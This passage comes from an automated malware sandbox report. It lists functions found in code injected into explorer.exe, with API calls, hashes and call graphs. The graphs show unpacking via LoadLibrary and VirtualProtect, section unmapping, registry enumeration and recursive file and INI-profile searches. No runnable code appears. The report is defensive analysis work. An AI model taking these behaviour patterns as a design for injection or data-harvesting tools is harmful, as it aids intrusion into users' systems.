                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: -x0$NaN
                        • API String ID: 0-3447725786
                        • Opcode ID: 8f0469e6a291e9136108cffaa24553a524c778c2108e41db8fe7c8c238f3bccf
                        • Instruction ID: 8883a2c927276c39493ec0d8e19e06db7e2d6dd2514f0b60adbfe4e0cc30ab5f
                        • Opcode Fuzzy Hash: 8f0469e6a291e9136108cffaa24553a524c778c2108e41db8fe7c8c238f3bccf
                        • Instruction Fuzzy Hash: 92E1F23060A3828BF765CE28C49077FFBE6AFC5A04F18499DF8C1972D1D669E941C782
                        Function 030077F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: -x0$NaN
                        • API String ID: 0-3447725786
                        • Opcode ID: 94577dee93eb0ec83e521d7469442a5f4ba7a5caa44e1a1acdb523f265c0c794
                        • Instruction ID: b4318a4251805c764822d7f0e1db00b9489059a6e9ad26e30d2e3f89e8bff469
                        • Opcode Fuzzy Hash: 94577dee93eb0ec83e521d7469442a5f4ba7a5caa44e1a1acdb523f265c0c794
                        • Instruction Fuzzy Hash: 16E1F27060E3828BF765CA28C49077FBBE6AFC5A04F18499DF8C1972C1D669E945C742
                        Function 030070C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON
                        Download Yara Rule
                        APIs
                        • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0300720E
                        • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 03007226
                        • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0300727B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _aulldvrm$_aullrem
                        • String ID: -x0$NaN
                        • API String ID: 105165338-3447725786
                        • Opcode ID: e30b5c5ed10c6a8c6bf5b6c2cf0ca43b4b264b325b2fe096084a2606ae1dba00
                        • Instruction ID: 2e115567dc9d5d797a42a0a6c3dd2a3b69e4ceb9cde901706855aca770115a6a
                        • Opcode Fuzzy Hash: e30b5c5ed10c6a8c6bf5b6c2cf0ca43b4b264b325b2fe096084a2606ae1dba00
                        • Instruction Fuzzy Hash: 44D1F37060E3828BF765CA28C49077FFBE6AFC5A04F18499DF8C1872D1D669E945C782
                        Function 0300898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON
                        Download Yara Rule
                        APIs
                        • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 03008AAD
                        • _allmul.NTDLL(?,?,0000000A,00000000), ref: 03008B66
                        • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 03008C9B
                        • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 03008CAE
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _allmul$_alldvrm
                        • String ID: .
                        • API String ID: 115548886-248832578
                        • Opcode ID: ce631160d33281f888376f3ed8b91363eaf16788d981ce8d709108d3fdbe440c
                        • Instruction ID: e3f40d7879c70c1c541cb15fd22d34443cb1263848b6cd39ff8778e31e441615
                        • Opcode Fuzzy Hash: ce631160d33281f888376f3ed8b91363eaf16788d981ce8d709108d3fdbe440c
                        • Instruction Fuzzy Hash: BBD105B190E7858BE714DF08888066EFBF5BBC5314F088E6EF6D5962C0D3B5C5458B86
                        Function 0302D684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memset
                        • String ID: ,$7$9
                        • API String ID: 2221118986-1653249994
                        • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                        • Instruction ID: 7641ee9f76198fc3343ea256b697695919fa0e38bfb1c0f6ac62c8dcff5c27bc
                        • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                        • Instruction Fuzzy Hash: 25316B715093949FD330DF60D840BCFBBE8AFC5240F00892EE98997251EB759549CBA2
                        Function 03001BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlenW.KERNEL32(00000000,00000000,?,03002E75,PathToExe,00000000,00000000), ref: 03001BCC
                        • StrStrIW.SHLWAPI(00000000,.exe,?,03002E75,PathToExe,00000000,00000000), ref: 03001BF0
                        • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,03002E75,PathToExe,00000000,00000000), ref: 03001C05
                        • lstrlenW.KERNEL32(00000000,?,03002E75,PathToExe,00000000,00000000), ref: 03001C1C
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen
                        • String ID: .exe
                        • API String ID: 1659193697-4119554291
                        • Opcode ID: d386892d0aa6b9578a20c6780d06209b1b0a04b4b7dddeb4e881d330eb7a5a80
                        • Instruction ID: 20105b287961f166e0901b59e4c8e67afd66c63762b3159f8bd665f5c9ce1c65
                        • Opcode Fuzzy Hash: d386892d0aa6b9578a20c6780d06209b1b0a04b4b7dddeb4e881d330eb7a5a80
                        • Instruction Fuzzy Hash: 56F0C2393133209AF7A9AF34AC45ABF62E5EF05341F18682AE082C71D1FB65C841C759
                        Function 03012FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON
                        Download Yara Rule
                        APIs
                        • _allmul.NTDLL(?,00000000,00000018), ref: 0301316F
                        • _allmul.NTDLL(-00000001,00000000,?,?), ref: 030131D2
                        • _alldiv.NTDLL(?,?,00000000), ref: 030132DE
                        • _allmul.NTDLL(00000000,?,00000000), ref: 030132E7
                        • _allmul.NTDLL(?,00000000,?,?), ref: 03013392
                          • Part of subcall function 030116CD: memset.NTDLL ref: 0301172B
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _allmul$_alldivmemset
                        • String ID:
                        • API String ID: 3880648599-0
                        • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                        • Instruction ID: 4b4ca80173eab79b6a433bc1243c6d4582dca07f16ff5bf0550d81dc7c31a8f4
                        • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                        • Instruction Fuzzy Hash: 66D1AA7860A3418FDB64DF69C480BAEBBE5BFC8704F08486DF98587250DB70E855CB96
                        Function 030387FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: FOREIGN KEY constraint failed$new$old
                        • API String ID: 0-384346570
                        • Opcode ID: d66d7774c98a03689d07452ebcc1320b089d41299d1a8b50beb192c528306318
                        • Instruction ID: 8df1d238cd4fe03648880d236228eb0c0e150f6aec6a7ef26237f18d3ed307a6
                        • Opcode Fuzzy Hash: d66d7774c98a03689d07452ebcc1320b089d41299d1a8b50beb192c528306318
                        • Instruction Fuzzy Hash: 78D146B87093009FDB14DF24C880B6FBBE9ABC9754F14895EF9858B280DB74D945CB92
                        Function 030096BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON
                        Download Yara Rule
                        APIs
                        • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 030096E7
                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 03009707
                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 03009739
                        • _alldiv.NTDLL(00000001,80000000,?,?), ref: 0300976C
                        • _allmul.NTDLL(?,?,?,?), ref: 03009798
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _alldiv$_allmul
                        • String ID:
                        • API String ID: 4215241517-0
                        • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                        • Instruction ID: 1eb7c495bdca551fafbed5920376d1972086469b432479b03036ea8369b954c5
                        • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                        • Instruction Fuzzy Hash: BA21F2375077152AF774DD1A9CC0BAFB5CDDBC1295F29453DEC19862F3EB52840180A2
                        Function 0301B162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                        Download Yara Rule
                        APIs
                        • _allmul.NTDLL(?,00000000,00000000), ref: 0301B1B3
                        • _alldvrm.NTDLL(?,?,00000000), ref: 0301B20F
                        • _allrem.NTDLL(?,00000000,?,?), ref: 0301B28A
                        • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0301B298
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _alldvrm_allmul_allremmemcpy
                        • String ID:
                        • API String ID: 1484705121-0
                        • Opcode ID: d0f4d66e9549b5788a2ee66365e866876d7701f9283c29450d11e4002fb57481
                        • Instruction ID: 5f4a43eb64065433c992389655c3c581660092e48b6657e94127fcaec67598b7
                        • Opcode Fuzzy Hash: d0f4d66e9549b5788a2ee66365e866876d7701f9283c29450d11e4002fb57481
                        • Instruction Fuzzy Hash: 1141387960A3419FC754EF29C89096FFBE5BFC8200F44492DF9858B261DB31E855CB92
                        Function 03001953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                        • lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                        • lstrcatW.KERNEL32(00000000,?), ref: 03001990
                        • lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrcatlstrlen
                        • String ID:
                        • API String ID: 1475610065-0
                        • Opcode ID: de6cb70b0bf3c695e8256e80a4d554de663035b66755b6bcc17baea6eaa86064
                        • Instruction ID: b43e7113c9fb1022438fd5ecf45c344782dcaa68cad756deb4433f27724b7c9c
                        • Opcode Fuzzy Hash: de6cb70b0bf3c695e8256e80a4d554de663035b66755b6bcc17baea6eaa86064
                        • Instruction Fuzzy Hash: 43E065B630131C1B9714B6AE9C94E7B76DCCAC95A57090079FA45D3205EA569C0546B0
                        Function 0302F21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 03006A81: memset.NTDLL ref: 03006A9C
                        • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0302F2A1
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _aulldivmemset
                        • String ID: %llu$%llu
                        • API String ID: 714058258-4283164361
                        • Opcode ID: 0b065b33dd90883ce3595e3683447230eaf9785b93e5722f4a4afedce2ce3808
                        • Instruction ID: 6d1c2290fe682505799045bd3eec2a818c32031267d45701cd2f139f8a09cfaa
                        • Opcode Fuzzy Hash: 0b065b33dd90883ce3595e3683447230eaf9785b93e5722f4a4afedce2ce3808
                        • Instruction Fuzzy Hash: 8021D4B664131A6BD710EA24CC41EAFB7A9EFC1770F054628F9219B2C0DB21AC2587E1
                        Function 0301203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON
                        Download Yara Rule
                        APIs
                        • _allmul.NTDLL(?,00000000,?), ref: 03012174
                        • _allmul.NTDLL(?,?,?,00000000), ref: 0301220E
                        • _allmul.NTDLL(?,00000000,00000000,?), ref: 03012241
                        • _allmul.NTDLL(03002E26,00000000,?,?), ref: 03012295
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _allmul
                        • String ID:
                        • API String ID: 4029198491-0
                        • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                        • Instruction ID: 63d3a838ff41839d321cf49062a5ac6dd1d3eb0cc56301ada9ad718e4530c558
                        • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                        • Instruction Fuzzy Hash: 0CA18C74709705AFD758EF68C880A6EB7EAAFC8704F044C2CF6558B250EB71EC648B42
                        Function 030178B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memcpymemset
                        • String ID:
                        • API String ID: 1297977491-0
                        • Opcode ID: bd4ab3b7838220b670d7bb475dfb9323845348dcb333e0ac54c314299f671957
                        • Instruction ID: 4b5374e43ba44e9cd6a8d848130709b041e4771c7e66d0c9c22d446f16928f80
                        • Opcode Fuzzy Hash: bd4ab3b7838220b670d7bb475dfb9323845348dcb333e0ac54c314299f671957
                        • Instruction Fuzzy Hash: 7781A17560A3149FC350DF29C880A6BBBE5FFC8A04F44496DF88A9B351D771E918CB91
                        Function 0300190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,?,?,?,00000000,03002783), ref: 0300192B
                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,03002783), ref: 03001930
                        • lstrcat.KERNEL32(00000000,?), ref: 03001946
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0300194A
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrcatlstrlen
                        • String ID:
                        • API String ID: 1475610065-0
                        • Opcode ID: 1b705cdb9450e3d1d2576c6965ea58b20874b70f40edabeece680a6a95d5360c
                        • Instruction ID: e55e12fcbb26e66f0ac42f9b7616a7ee53cba811fbfa076984f7e3786f9db697
                        • Opcode Fuzzy Hash: 1b705cdb9450e3d1d2576c6965ea58b20874b70f40edabeece680a6a95d5360c
                        • Instruction Fuzzy Hash: 96E02BA630131C2B5B24B2AE5C84E7B76DCCAC81A17090075FE05C3201EE569C0146B0

                        Execution Graph

                        Execution Coverage:21.6%
                        Dynamic/Decrypted Code Coverage:87.1%
                        Signature Coverage:0%
                        Total number of Nodes:178
                        Total number of Limit Nodes:16
                        execution_graph 941 98a298 946 98a29d 941->946 942 98a385 LoadLibraryA 942->946 944 98a3e0 VirtualProtect VirtualProtect 945 98a46e 944->945 945->945 946->942 946->944 947 98a3d5 946->947 991 983608 996 983458 StrStrIW 991->996 994 983458 17 API calls 995 98365d 994->995 997 98348f 996->997 998 98350f 996->998 1021 982774 997->1021 1000 983523 RegOpenKeyExW 998->1000 1001 9835e4 1000->1001 1007 98354d 1000->1007 1002 981860 RtlDeleteBoundaryDescriptor 1001->1002 1005 9835f7 1002->1005 1003 9835b5 RegEnumKeyExW 1003->1001 1003->1007 1004 9834a8 1004->998 1006 983507 1004->1006 1034 9828a0 1004->1034 1005->994 1008 981860 RtlDeleteBoundaryDescriptor 1006->1008 1007->1003 1010 982700 RtlDeleteBoundaryDescriptor 1007->1010 1013 983458 14 API calls 1007->1013 1017 981860 RtlDeleteBoundaryDescriptor 1007->1017 1008->998 1010->1007 1012 9834fa 1014 981860 RtlDeleteBoundaryDescriptor 1012->1014 1013->1007 1014->1006 1017->1007 1020 981860 RtlDeleteBoundaryDescriptor 1020->1012 1022 982793 1021->1022 1023 982797 RegOpenKeyExW 1021->1023 1022->1023 1024 98286b 1023->1024 1025 9827d5 RegQueryValueExW 1023->1025 1026 98288d 1024->1026 1028 982774 RtlDeleteBoundaryDescriptor 1024->1028 1027 98285b RegCloseKey 1025->1027 1029 9827fe 1025->1029 1026->1004 1027->1024 1027->1026 1028->1026 1029->1027 1030 98281a RegQueryValueExW 1029->1030 1031 982851 1030->1031 1032 982844 1030->1032 1033 981860 RtlDeleteBoundaryDescriptor 1031->1033 1032->1027 1033->1032 1035 9828b9 1034->1035 1036 982922 1035->1036 1037 981860 RtlDeleteBoundaryDescriptor 1035->1037 1036->1012 1040 982700 1036->1040 1039 9828df 1037->1039 1038 982774 5 API calls 1038->1039 1039->1036 1039->1038 1041 982712 1040->1041 1042 981860 RtlDeleteBoundaryDescriptor 1041->1042 1043 98271d 1042->1043 1043->1012 1044 983254 1043->1044 1068 98298c 1044->1068 1047 98343a 1047->1020 1048 98298c GetFileAttributesW 1051 983295 1048->1051 1049 98342c 1077 9830a8 1049->1077 1051->1047 1051->1049 1072 982938 1051->1072 1054 98340c 1056 981860 RtlDeleteBoundaryDescriptor 1054->1056 1055 983304 GetPrivateProfileSectionNamesW 1055->1054 1066 98331e 1055->1066 1057 983414 1056->1057 1058 981860 RtlDeleteBoundaryDescriptor 1057->1058 1059 98341c 1058->1059 1060 981860 RtlDeleteBoundaryDescriptor 1059->1060 1062 983424 1060->1062 1061 98334e GetPrivateProfileStringW 1063 983379 GetProfileIntW 1061->1063 1061->1066 1064 981860 RtlDeleteBoundaryDescriptor 1062->1064 1063->1066 1064->1049 1065 9830a8 RtlDeleteBoundaryDescriptor FindFirstFileW FindNextFileW FindClose 1065->1066 1066->1054 1066->1061 1066->1065 1067 981860 RtlDeleteBoundaryDescriptor 1066->1067 1067->1066 1069 982999 1068->1069 1071 9829a9 1068->1071 1070 98299e GetFileAttributesW 1069->1070 1069->1071 1070->1071 1071->1047 1071->1048 1073 982980 1072->1073 1074 982945 1072->1074 1073->1054 1073->1055 1074->1073 1075 98294a CreateFileW 1074->1075 1075->1073 1076 982972 FindCloseChangeNotification 1075->1076 1076->1073 1078 9830cc 1077->1078 1079 9830f1 FindFirstFileW 1078->1079 1080 983237 1079->1080 1083 983117 1079->1083 1081 981860 RtlDeleteBoundaryDescriptor 1080->1081 1082 98323f 1081->1082 1084 981860 RtlDeleteBoundaryDescriptor 1082->1084 1086 983210 FindNextFileW 1083->1086 1088 981860 RtlDeleteBoundaryDescriptor 1083->1088 1090 982700 RtlDeleteBoundaryDescriptor 1083->1090 1091 9830a8 RtlDeleteBoundaryDescriptor 1083->1091 1092 981860 RtlDeleteBoundaryDescriptor 1083->1092 1093 982f7c 1083->1093 1085 983247 1084->1085 1085->1047 1086->1083 1087 983226 FindClose 1086->1087 1087->1080 1088->1086 1090->1083 1091->1083 1092->1083 1103 982bc0 1093->1103 1096 983086 1096->1083 1098 98307e 1099 981860 RtlDeleteBoundaryDescriptor 1098->1099 1099->1096 1100 982e04 RtlDeleteBoundaryDescriptor 1102 982fb6 1100->1102 1101 981860 RtlDeleteBoundaryDescriptor 1101->1102 1102->1096 1102->1098 1102->1100 1102->1101 1104 982bf3 1103->1104 1105 982700 RtlDeleteBoundaryDescriptor 1104->1105 1106 982c54 1105->1106 1107 982a54 RtlDeleteBoundaryDescriptor 1106->1107 1108 982c68 1107->1108 1109 982c7e 1108->1109 1110 981860 RtlDeleteBoundaryDescriptor 1108->1110 1111 981860 RtlDeleteBoundaryDescriptor 1109->1111 1110->1109 1117 982cb2 1111->1117 1112 982da3 1113 981860 RtlDeleteBoundaryDescriptor 1112->1113 1114 982dd9 1113->1114 1115 981860 RtlDeleteBoundaryDescriptor 1114->1115 1116 982de1 1115->1116 1116->1096 1119 982a54 1116->1119 1117->1112 1118 981860 RtlDeleteBoundaryDescriptor 1117->1118 1118->1112 1121 982a86 1119->1121 1120 982ad9 1120->1102 1121->1120 1122 981860 RtlDeleteBoundaryDescriptor 1121->1122 1122->1120 1134 983668 1135 983458 17 API calls 1134->1135 1136 98369b 1135->1136 1137 983458 17 API calls 1136->1137 1138 9836bd 1137->1138 1123 98a1f9 1124 98a228 1123->1124 1126 98a248 1123->1126 1127 98a298 1124->1127 1132 98a29d 1127->1132 1128 98a385 LoadLibraryA 1128->1132 1130 98a3e0 VirtualProtect VirtualProtect 1131 98a46e 1130->1131 1131->1131 1132->1128 1132->1130 1133 98a3d5 1132->1133 1133->1126 1139 98a1af 1140 98a1bd 1139->1140 1141 98a298 3 API calls 1140->1141 1142 98a1cf 1140->1142 1141->1142 1143 98a1e0 1144 98a1e6 1143->1144 1145 98a298 3 API calls 1144->1145 1146 98a248 1145->1146 948 9837f4 949 983804 948->949 954 98372c 949->954 951 98387c 952 983809 952->951 961 9836c8 952->961 955 98375a 954->955 956 983777 RegCreateKeyExW 955->956 957 9837bc RegCloseKey 956->957 958 9837cd 956->958 957->958 969 981860 958->969 962 9836cd 961->962 966 98371e 961->966 963 983716 962->963 973 9821e4 962->973 965 981860 RtlDeleteBoundaryDescriptor 963->965 965->966 966->951 967 983706 968 981860 RtlDeleteBoundaryDescriptor 967->968 968->963 970 98186e 969->970 971 981886 970->971 972 981878 RtlDeleteBoundaryDescriptor 970->972 971->952 972->971 974 98220b 973->974 979 981e20 974->979 977 981860 RtlDeleteBoundaryDescriptor 978 982297 977->978 978->967 989 981e6d 979->989 980 9821b5 981 981860 RtlDeleteBoundaryDescriptor 980->981 982 9821cb 981->982 982->977 983 98219b 983->980 984 981860 RtlDeleteBoundaryDescriptor 983->984 984->980 985 982177 986 981860 RtlDeleteBoundaryDescriptor 985->986 987 98218e 986->987 987->983 988 981860 RtlDeleteBoundaryDescriptor 987->988 988->983 989->980 989->983 989->985 990 981860 RtlDeleteBoundaryDescriptor 989->990 990->985

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_0098A298 50 Function_0098A25A 0->50 1 Function_00982498 39 Function_009823AC 1->39 64 Function_00982340 1->64 2 Function_0098971C 3 Function_0098141D 4 Function_00982610 28 Function_00981838 4->28 5 Function_00982410 5->39 74 Function_009823F0 5->74 6 Function_00981D10 6->28 68 Function_009818F8 6->68 7 Function_0098B111 8 Function_00989912 9 Function_00989C92 10 Function_00982514 43 Function_009823A0 10->43 53 Function_00982354 10->53 61 Function_0098234C 10->61 10->74 88 Function_00982360 10->88 11 Function_00981B14 11->28 12 Function_00983608 48 Function_00983458 12->48 13 Function_00982688 13->28 14 Function_00982308 15 Function_00981508 16 Function_0098B00C 17 Function_0098298C 18 Function_00981B8C 18->28 19 Function_0098188C 19->28 20 Function_00981980 21 Function_00981000 22 Function_00982700 22->13 85 Function_00981860 22->85 23 Function_0098B181 24 Function_00984082 25 Function_00982E04 25->18 25->28 25->85 26 Function_00981405 27 Function_00982938 29 Function_00981938 30 Function_00989930 31 Function_009838B0 31->28 31->31 54 Function_00981AD4 31->54 32 Function_009814B2 33 Function_00989EB4 34 Function_009822B4 35 Function_009830A8 35->13 35->22 35->35 40 Function_0098272C 35->40 69 Function_00982AF8 35->69 73 Function_00982F7C 35->73 35->85 36 Function_009841A9 37 Function_0098372C 37->28 37->85 38 Function_009822AC 41 Function_0098A1AF 41->0 42 Function_009828A0 42->28 76 Function_00982774 42->76 42->85 44 Function_00981E20 44->6 44->19 44->20 44->28 51 Function_009818D0 44->51 63 Function_00981C40 44->63 44->68 44->85 86 Function_00981DE0 44->86 45 Function_00981822 46 Function_009899A7 47 Function_009847A7 48->13 48->22 48->28 48->42 48->48 52 Function_00983254 48->52 65 Function_009829C0 48->65 48->76 48->85 49 Function_00989ADA 52->13 52->17 52->27 52->28 52->35 52->40 52->85 55 Function_009814D4 56 Function_00981254 57 Function_00982A54 57->28 57->85 58 Function_0098A055 59 Function_009836C8 59->11 79 Function_009818E8 59->79 59->85 89 Function_009821E4 59->89 60 Function_00984048 62 Function_00981A4C 65->13 66 Function_00982BC0 66->4 66->13 66->22 66->28 66->29 66->40 66->57 66->85 67 Function_00989FC2 69->28 70 Function_00982EF8 70->4 71 Function_0098A1F9 71->0 72 Function_009814F9 73->25 73->57 73->66 73->70 73->85 74->39 75 Function_00982570 75->28 75->43 75->53 76->28 76->76 76->85 77 Function_009837F4 77->14 77->34 77->37 77->38 77->53 77->59 77->75 80 Function_009822E8 77->80 83 Function_00982B6C 77->83 78 Function_00981576 81 Function_00983668 81->48 82 Function_0098156C 83->1 83->10 84 Function_0098A1E0 84->0 85->54 86->62 87 Function_00981560 89->28 89->44 89->85

                        Executed Functions

                        Function 009830A8 Relevance: 4.7, APIs: 3, Instructions: 153fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 184 9830a8-9830e3 call 982688 call 98272c 189 9830ec-983111 call 982688 FindFirstFileW 184->189 190 9830e5-9830e6 184->190 193 983237-983252 call 981860 * 2 189->193 194 983117-983118 189->194 190->189 195 98311f-983124 194->195 197 98312a-98313e 195->197 198 9831ad-9831df call 982688 call 982700 195->198 205 983210-983220 FindNextFileW 197->205 206 983144-983158 197->206 214 983208-98320b call 981860 198->214 215 9831e1-9831eb call 982af8 198->215 205->195 208 983226-983230 FindClose 205->208 206->205 211 98315e-98316b call 98272c 206->211 208->193 219 98316d-983174 211->219 220 983176 211->220 214->205 215->214 223 9831ed-983203 call 982f7c 215->223 222 983178-9831a8 call 982688 call 982700 call 9830a8 call 981860 219->222 220->222 222->198 223->214
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                        • Instruction ID: 325d3da0b7a9a84afe3faaf0573e73c78ccd1a04f38aab8114a9966ac133d40c
                        • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                        • Instruction Fuzzy Hash: 9D417F30318B4C4FDB94FB3998997AE73D6FBD8740F448A29A44AC3391EE78D9048781
                        Function 009838B0 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 239 9838b0-983907 call 981ad4 call 981838 NtUnmapViewOfSection call 98388c 248 983909-98390c call 9838b0 239->248 249 983911-98391a 239->249 248->249
                        APIs
                        • NtUnmapViewOfSection.NTDLL ref: 009838F2
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: SectionUnmapView
                        • String ID:
                        • API String ID: 498011366-0
                        • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                        • Instruction ID: dc63b9085b87cf2e8e2c01f4cf1c4c7b39c8201709e428cbea29b9270c11d77b
                        • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
